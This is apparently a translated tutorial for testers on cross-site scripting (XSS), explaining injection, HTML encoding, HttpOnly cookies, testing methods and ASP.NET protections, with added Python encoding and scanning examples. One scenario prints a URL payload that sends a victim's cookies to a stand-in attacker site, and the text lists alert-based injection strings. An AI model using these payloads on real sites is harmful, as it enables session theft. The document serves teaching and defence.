XSS for web security testing


Reposted from: http://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html

XSS (Cross-Site Scripting) is the most common vulnerability in web applications. An attacker embeds client-side script (such as JavaScript) in a web page; when a user browses to that page, the script executes in the user's browser and achieves the attacker's purpose, for example stealing the user's cookie, redirecting to a malicious website, or planting a Trojan.

As testers, we need to understand how XSS works, its attack scenarios and how to fix it, so that XSS can be prevented effectively.

Contents

    1. How XSS happens
    2. HTML Encode
    3. XSS attack scenarios
    4. Fixing XSS vulnerabilities
    5. How to test for XSS vulnerabilities
    6. The difference between HTML Encode and URL Encode
    7. XSS filters in the browser
    8. The XSS security mechanism in ASP.NET
How does XSS happen?

Suppose there is a textbox like the one below

<input type="text" name="Address1" value="Value1from">

Value1from is the user's input. If instead of Value1from the user enters "/><script>alert(document.cookie)</script><!-- then it becomes

<input type="text" name="Address1" value=""/><script>alert(document.cookie)</script><!--">

The embedded JavaScript code will be executed.

Or the user enters " onfocus="alert(document.cookie) and it becomes

<input type="text" name="Address1" value="" onfocus="alert(document.cookie)">

The embedded JavaScript code will be executed when the event is triggered.

How much damage the attack does depends on what script the user has entered.

Of course, user-submitted data can also reach the server via the query string (placed in the URL) and via cookies. For example

HTML Encode

XSS occurs because data entered by the user becomes code. So data entered by the user must be HTML-encoded before it is written into the page: special characters such as angle brackets, single quotes and double quotes are encoded.

C# provides a ready-made method: just call HttpUtility.HtmlEncode("string <script>") (the System.Web assembly must be referenced).

Fiddler also provides a handy tool: click the "TextWizard" button on the toolbar.
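The following is an added example of mine, not code from the article, written in Python rather than the article's C#. html.escape(quote=True) stands in for HttpUtility.HtmlEncode, and the three inputs are the article's own test strings. Parsing the rendered textbox the way a browser would makes the point concrete: without encoding, the two payloads produce a second element or an event-handler attribute; with encoding, the page contains exactly one input whose value attribute is the user's text, unchanged.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs: the benign value plus the article's two test strings.
PAYLOADS = [
    'Value1from',                                        # benign input
    '"/><script>alert(document.cookie)</script><!--',    # breaks out of the attribute
    '" onfocus="alert(document.cookie)',                 # adds an event-handler attribute
]


def render_textbox_unsafe(value: str) -> str:
    """The article's textbox with the user's value pasted in verbatim (vulnerable)."""
    return f'<input type="text" name="Address1" value="{value}">'


def render_textbox_safe(value: str) -> str:
    """Same textbox, but the value is HTML-encoded first.

    html.escape(quote=True) encodes & < > " and ', which covers the characters
    the article's HttpUtility.HtmlEncode call is used for.
    """
    return f'<input type="text" name="Address1" value="{html.escape(value, quote=True)}">'


class _Inventory(HTMLParser):
    """Records every start tag with its attributes: what the browser would build."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    # <input .../> is reported through this hook; count it once, not twice.
    handle_startendtag = handle_starttag


def inventory(markup: str):
    """Return [(tag, {attribute: value}), ...] for the given markup."""
    parser = _Inventory()
    parser.feed(markup)
    parser.close()
    return parser.tags


def is_inert(markup: str, user_value: str) -> bool:
    """True if the markup is exactly one <input> whose value attribute round-trips
    to the user's original text and that carries no on* event handler."""
    tags = inventory(markup)
    if len(tags) != 1 or tags[0][0] != "input":
        return False          # extra elements such as <script> appeared
    attrs = tags[0][1]
    if any(name.startswith("on") for name in attrs):
        return False          # an event handler was injected into the tag
    # The parser decodes &lt; &quot; etc., so an encoded value comes back intact.
    return attrs.get("value") == user_value


if __name__ == "__main__":
    for p in PAYLOADS:
        print("unsafe:", is_inert(render_textbox_unsafe(p), p),
              "| safe:", is_inert(render_textbox_safe(p), p))
```

The round-trip check in is_inert is the useful part: encoding does not throw the user's text away (the value attribute still reads exactly what was typed), it only stops that text from being interpreted as markup.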

XSS attack scenarios

1. The attack process for the DOM-based XSS vulnerability is as follows

Tom finds a page on victim.com with an XSS vulnerability,

for example: http://victim.com/search.asp?term=apple

The server-side code of the search.asp page is roughly the following

<title></title>
<body>
Results for <%=Request.QueryString("term")%>
...
</body>

Tom first sets up a website, http://badguy.com, to receive the "stolen" information.
Then Tom constructs a malicious URL (below) and sends it to Monica in some way (mail, QQ)

http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

When Monica clicks this URL, the malicious JavaScript code embedded in the URL is executed in Monica's browser, and Monica's cookies for victim.com are sent to the badguy website. Monica's information on victim.com has thus been stolen by Tom.

2. Stored XSS (a stored XSS vulnerability) is widespread and can affect the security of a large web server: an attacker uploads an attack script to the web server, so that every user who visits the page is exposed to possible information disclosure. The attack process is as follows

Alex finds an XSS vulnerability on site A that allows the attack code to be saved in the database.

Alex publishes an article with malicious JavaScript code embedded in it.

When other people, such as Monica, visit this article, the malicious JavaScript code embedded in it is executed in Monica's browser, and her session cookie or other information is stolen by Alex.

The DOM-based XSS vulnerability threatens an individual user, whereas a stored XSS vulnerability threatens a large number of users.

Fixing XSS vulnerabilities

Principle: do not trust data entered by the client.
Note: the attack code is not necessarily inside <script></script>.

    1. Mark important cookies as HttpOnly, so that the document.cookie statement in JavaScript cannot read them.
    2. Only allow users to enter the data we expect. For example, in an age textbox only allow digits, and filter out any non-digit characters.
    3. HTML-encode the data.
    4. Filter or remove special HTML tags such as <script> and <iframe>, and encode < as &lt;, > as &gt; and " as &quot;.
    5. Filter JavaScript event attributes such as "onclick=", "onfocus=" and so on.
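An added example of mine (not the article's code) for items 1 and 2 of the list above, in Python rather than C#: an allow-list validator for the age textbox, which rejects anything that is not a short run of digits instead of trying to clean it, and a Set-Cookie header built with the HttpOnly flag so that document.cookie cannot read the session cookie. The cookie name "session" and the sample value are assumptions for the example.

```python
import re
from http.cookies import SimpleCookie

# Allow-list for the article's age textbox: one to three digits and nothing else.
AGE_RE = re.compile(r"^[0-9]{1,3}$")


def validate_age(raw: str) -> int:
    """Item 2: accept only what we expect for an age field.

    Input that is outside the allow-list is rejected outright. Rejecting is
    preferable to stripping characters, because a stripped string is a new,
    unreviewed value that still has to be reasoned about.
    """
    if not AGE_RE.match(raw):
        raise ValueError("age must be 1-3 digits")
    age = int(raw)
    if not 0 <= age <= 150:
        raise ValueError("age out of range")
    return age


def session_cookie_header(session_id: str, name: str = "session") -> str:
    """Item 1: mark the session cookie HttpOnly so script cannot read it.

    Secure is set as well so the cookie only travels over HTTPS. Returns the
    complete response header line, e.g. "Set-Cookie: session=...; HttpOnly; Secure".
    """
    jar = SimpleCookie()
    jar[name] = session_id
    jar[name]["httponly"] = True
    jar[name]["secure"] = True
    return jar.output()


def readable_by_script(set_cookie_line: str) -> bool:
    """What the article's document.cookie test would observe: a cookie set
    without HttpOnly is visible to any script that runs in the page."""
    return "httponly" not in set_cookie_line.lower()


if __name__ == "__main__":
    print(validate_age("42"))
    header = session_cookie_header("abc123")   # constructed sample session id
    print(header, "| readable by script:", readable_by_script(header))
```

Note that HttpOnly protects the cookie, not the page: a script that does run can still act on the user's behalf, so items 1 and 2 are complements to encoding (item 3), not substitutes for it.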
How to test for XSS vulnerabilities

Method one: read the code and look for the key variables. The client generally sends data to the web server in three ways: the query string, form fields and cookies. For example, in an ASP program the client's variables are obtained through the Request object

<%
strUserCode = Request.QueryString("code")
strUser = Request.Form("USER")
strID = Request.Cookies("ID")
%>

If a variable is not HTML-encoded before output, it has an XSS vulnerability.

Method two: prepare test scripts,

"/><script>alert(document.cookie)</script><!--
<script>alert(document.cookie)</script><!--
" onclick="alert(document.cookie)

Enter these test scripts into the textboxes and other input fields of the web page and see whether a dialog box pops up; if one does, an XSS vulnerability exists.

Look at which variables are passed to the web server through the URL, give those variables our test script as their values, and see whether the script executes.

Method three: automated testing for XSS vulnerabilities
There are many XSS scanning tools now. Implementing automated XSS testing is simple and only needs the HttpWebRequest class: put the XSS test script in a request, send it to the web server, then look at the HttpWebResponse to see whether our test script has been injected into the page.
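Method three, as an added example of mine in Python instead of the article's HttpWebRequest; it is not the article's code. Two small functions stand in for the search.asp page from the scenario above, before and after HTML-encoding the term parameter, so the check runs offline. The probe string is a constructed, harmless marker that contains the characters needed to break out of text or an attribute but no script; the scanner reports whether it came back raw (vulnerable) or in its encoded form (escaped). The fetch parameter is whatever performs the request, in a real test the HTTP client.

```python
import html
from urllib.parse import parse_qs, quote_plus, urlsplit

# Constructed probe: a unique marker plus the characters that matter for XSS,
# so it can be located in a large response and is harmless if it does execute.
PROBE = 'xsstest7b3<"\'>/'


def _term_from(url: str) -> str:
    """Read the ?term= parameter the way the server would (URL-decoded)."""
    return parse_qs(urlsplit(url).query).get("term", [""])[0]


def search_asp_vulnerable(url: str) -> str:
    """Stand-in for the article's search.asp: echoes the parameter unencoded."""
    return f"<title></title>\n<body>\nResults for {_term_from(url)}\n...\n</body>"


def search_asp_fixed(url: str) -> str:
    """The same page after the fix: the parameter is HTML-encoded before output."""
    term = html.escape(_term_from(url), quote=True)
    return f"<title></title>\n<body>\nResults for {term}\n...\n</body>"


def reflected_unencoded(body: str, probe: str = PROBE) -> bool:
    """Did the probe come back with its special characters intact?"""
    return probe in body


def scan(fetch, base_url: str, param: str) -> dict:
    """Send the probe in one parameter and report how the response reflects it.

    fetch(url) -> body is supplied by the caller: here one of the fake pages
    above, in a real test the HttpWebRequest/HttpWebResponse round trip.
    """
    url = f"{base_url}?{param}={quote_plus(PROBE)}"
    body = fetch(url)
    return {
        "url": url,
        "reflected_raw": reflected_unencoded(body),
        "reflected_encoded": html.escape(PROBE, quote=True) in body,
    }


if __name__ == "__main__":
    for page in (search_asp_vulnerable, search_asp_fixed):
        print(page.__name__, scan(page, "http://victim.com/search.asp", "term"))
```

Two caveats a tester should keep in mind: a probe that comes back raw inside an HTML comment or a JavaScript string is still a finding but needs a different breakout than the attribute case, and a probe that comes back encoded in one place may still be reflected raw somewhere else on the same page, so search the whole body rather than stopping at the first match.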

The difference between HTML Encode and URL Encode

At first I always confused these two things, which are actually two different things.

HTML encoding was described earlier. URL encoding exists to make a URL conform to the URL specification, because Chinese characters and many other characters are not allowed to appear in a URL.

For example, searching Baidu for "test Chinese characters" turns the URL into
http://www.baidu.com/s?wd=%B2%E2%CA%D4%BA%BA%D7%D6&rsv_bp=0&rsv_spt=3&inputT=7477

So-called URL encoding means: every non-alphanumeric character is replaced with a percent sign (%) followed by two hexadecimal digits, and a space is encoded as a plus sign (+).

C# provides a ready-made method: just call HttpUtility.UrlEncode("string <script>") (the System.Web assembly must be referenced).

Fiddler also provides a handy tool: click the "TextWizard" button on the toolbar.
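An added example of mine, not the article's code, putting the two encodings side by side in Python: html.escape stands in for HttpUtility.HtmlEncode and urllib.parse.quote_plus for HttpUtility.UrlEncode, applied to the article's own "string <script>" and to the Chinese search phrase. The phrase 测试汉字 ("test Chinese characters") is assumed from the bytes in the article's Baidu URL, which are its GBK encoding. The last function shows why URL encoding is not an XSS defence: the server decodes it before the value reaches the page.

```python
import html
from urllib.parse import quote_plus, unquote_plus

SAMPLE = "string <script>"   # the article's own example string
CHINESE = "测试汉字"          # assumed: the search phrase behind the Baidu URL


def html_encode(text: str) -> str:
    """HTML encoding: makes text safe to place inside an HTML page.
    Only markup characters change; letters, digits and Chinese pass through."""
    return html.escape(text, quote=True)


def url_encode(text: str, encoding: str = "utf-8") -> str:
    """URL encoding: makes text safe to place inside a URL.
    Bytes outside the unreserved set become %XX and a space becomes '+'.
    The byte values depend on the character encoding chosen."""
    return quote_plus(text, encoding=encoding)


def baidu_query(term: str) -> str:
    """Rebuild the article's Baidu URL: that site URL-encoded the GBK bytes."""
    return f"http://www.baidu.com/s?wd={url_encode(term, encoding='gbk')}"


def server_side_view(url_encoded_param: str) -> str:
    """What the page sees: the web server URL-decodes the parameter first, so a
    URL-encoded <script> arrives as a plain <script> and still needs HTML encoding."""
    return unquote_plus(url_encoded_param)


if __name__ == "__main__":
    for text in (SAMPLE, CHINESE):
        print(repr(text), "->", html_encode(text), "|", url_encode(text))
    print(baidu_query(CHINESE))
    print(server_side_view(url_encode(SAMPLE)))
```

One detail the article's description leaves out: quote_plus, like most URL encoders, leaves the unreserved characters - _ . ~ unencoded as well as letters and digits, so "all non-alphanumeric characters" is an approximation.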

XSS filters in the browser

To prevent XSS, many browser vendors have added XSS filtering to their browsers. For example, IE8, IE9, Firefox and Chrome all have security mechanisms against XSS, and the browser will block the XSS. For example

If you need to do a test, it is best to use IE7.

The XSS security mechanism in ASP.NET

ASP.NET has a mechanism to prevent XSS: submitted forms are automatically checked for XSS, and when a user tries to enter XSS code, ASP.NET throws an error such as

Many programmers have no concept of security and do not even know that XSS exists, so ASP.NET provides this security by default. In this way, even a programmer without security awareness can write a "safer site".

If you want to disable this security feature, you can use <%@ Page ValidateRequest="false" %>
